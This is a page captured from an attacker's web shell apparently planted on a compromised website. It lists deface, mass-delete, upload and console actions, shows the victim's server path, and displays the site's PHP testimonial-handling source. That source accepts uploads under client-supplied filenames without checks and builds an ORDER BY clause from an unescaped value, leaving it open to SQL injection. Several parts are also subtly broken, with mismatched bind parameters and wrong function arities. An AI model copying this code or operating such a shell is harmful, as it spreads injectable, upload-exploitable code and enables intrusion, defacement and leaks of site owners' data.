shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
public_html
/
dev2.delv-in.com
/
models
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
m_testimonies.php
<?php class Testimonial { private $Database; private $db_table = 'testimonials'; function __construct(){ global $Database; $this->Database = $Database; } public function get($testID, $rank){ $data = array(); $Template = new Template; if ($testID > 0){ // get 1 if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " WHERE testID = ?")){ $stmt->bind_param('i', $testID); $stmt->execute(); $stmt->store_result(); $stmt->bind_result($testID, $dispName, $message, $photo, $rank, $addedTS); if ($stmt->num_rows() > 0){ $stmt->fetch(); $data = array('testID'=>$testID, 'dispName'=>$dispName, 'message'=>$message, 'photo'=>$photo, 'rank'=>$rank, 'addedTS'=>$addedTS); return $data; $stmt->close(); } } else { $Template->set_alert("Query error: ".__line__." m_testimonies"); } } else { // get all if ($rank == ''){ $rank = 'addedTS DESC'; } if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " ORDER BY ".$rank)){ $stmt->execute(); $stmt->store_result(); $stmt->bind_result($testID, $dispName, $message, $photo, $rank, $addedTS); while ($stmt->fetch()){ $data[] = array('testID'=>$testID, 'dispName'=>$dispName, 'message'=>$message, 'photo'=>$photo, 'rank'=>$rank, 'addedTS'=>$addedTS); } return $data; $stmt->close(); } else { $Template->set_alert("Query error: ".__line__." m_testimonies"); } } } // end get method public function add_mod($testID, $dispName, $message, $xPhoto){ $Template = new Template; $photo = $xPhoto; $upload_result = 'false'; $uploadfile = ''; if ($_FILES['photo']['name'] != ''){ // upload the temp file $uploadfile = "views/images/testimonials/".$_FILES['photo']['name']; if (move_uploaded_file($_FILES['photo']['tmp_name'], $uploadfile)) { $attach = $_FILES['photo']['name']; $upload_result = $uploadfile; } $photo = $_FILES['photo']['name']; } else if (isset($_POST['delPhoto'])){ $photo = ''; } date_default_timezone_set('Canada/Pacific'); $addedTS = strtotime('now'); if ($testID > 0){ // update record if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table . " SET dispName=?, message=?, photo=?, addedTS=? WHERE testID = ?")){ $stmt->bind_param('sssii', $dispName, $message, $photo, $rank, $addedTS, $testID); if ($stmt->execute()){ $alert_message = 'Testimonial updated'; if ($upload_result != 'false' && $_FILES['photo']['name'] != ''){ $alert_message .= " & photo upload successful."; } else if ($upload_result == 'false' && $_FILES['photo']['name'] != ''){ $alert_message .= " BUT photo did not upload (" . $uploadfile . ")."; } $Template->set_alert($alert_message, 'success'); } else { $Template->set_alert('ERROR: Testimonial did not update', 'error'); } } } else { // insert record $rows = $this->get('', ''); $rank = count($rows) + 1; if ($stmt = $this->Database->prepare("INSERT INTO ". $this->db_table . " (testID, dispName, message, photo, rank, addedTS) VALUES (?,?,?,?,?,?)")){ $stmt->bind_param('isssii', $testID, $dispName, $message, $photo, $rank, $addedTS); if ($stmt->execute()){ $alert_message = 'Testimonial added'; if ($upload_result === true){ $alert_message .= " & photo upload successful."; } else { $alert_message .= " BUT photo did not upload."; } $Template->set_alert($alert_message, 'success'); } else { $Template->set_alert('ERROR: Testimonial was not added', 'error'); } } } } // end add_mod method public function update_rank($testID, $rank, $oldRank){ $Template = new Template; echo __line__.": rank =".$rank.", oldRank=".$oldRank."<br>"; $increment = 1; if ($rank > $oldRank){ $this->decrement_rank($testID, $rank, $oldRank); } else if ($rank < $oldRank){ $this->increment_rank($testID, $rank, $oldRank); } if ($testID > 0){ $query = "UPDATE " . $this->db_table ." SET rank = '".$rank."' WHERE testID = '".$testID."'"; // echo __line__.": ".$query."<br>"; if ($stmt = $this->Database->prepare("UPDATE " . $this->db_table ." SET rank = ? WHERE testID = ?")){ $stmt->bind_param('ii', $rank, $testID); if ($stmt->execute()){ $Template->set_alert('Changes saved', 'success'); } else { $Template->set_alert('ERROR: Changes not saved', 'error'); } $stmt->close(); } } } public function decrement_rank($rank, $oldRank){ $increment = 1; $Template = new Template; $query = 'UPDATE ' . $this->db_table . " SET rank = rank-1 WHERE rank > '".$oldRank."' and rank <= '".$rank."'"; // echo __line__.": ".$query."<br>"; if ($stmt = $this->Database->prepare('UPDATE ' . $this->db_table . " SET rank = rank-? WHERE rank > ? and rank <= ?")){ $stmt->bind_param('iii', $increment, $oldRank, $rank); $stmt->execute(); // $Template->set_alert($query); $stmt->close(); } } public function increment_rank($testID, $rank, $oldRank){ $increment = 1; $Template = new Template; $query = "UPDATE ". $this->db_table . " SET rank = rank + 1 WHERE rank < '".$oldRank."' and rank >= '".$rank."'"; // echo __line__.": ".$query."<br>"; if ($stmt = $this->Database->prepare('UPDATE ' . $this->db_table . " SET rank = rank+? WHERE rank < ? and rank >= ?")){ $stmt->bind_param('iii', $increment, $oldRank, $rank); $stmt->execute(); // $Template->set_alert($query); $stmt->close(); } } public function delete($testID, $rank){ $Template = new Template; if ($stmt = $this->Database->prepare("DELETE FROM " . $this->db_table . " WHERE testID=?")){ $stmt->bind_param('i', $testID); if ($stmt->execute()){ $this->update_rank($testID, '', $rank); $Template->set_alert('Testimonial deleted', 'success'); } else { $Template->set_alert('ERROR: Testimonial was not deleted', 'error'); } } } // end delete method } ?>
© 2026 UnknownSec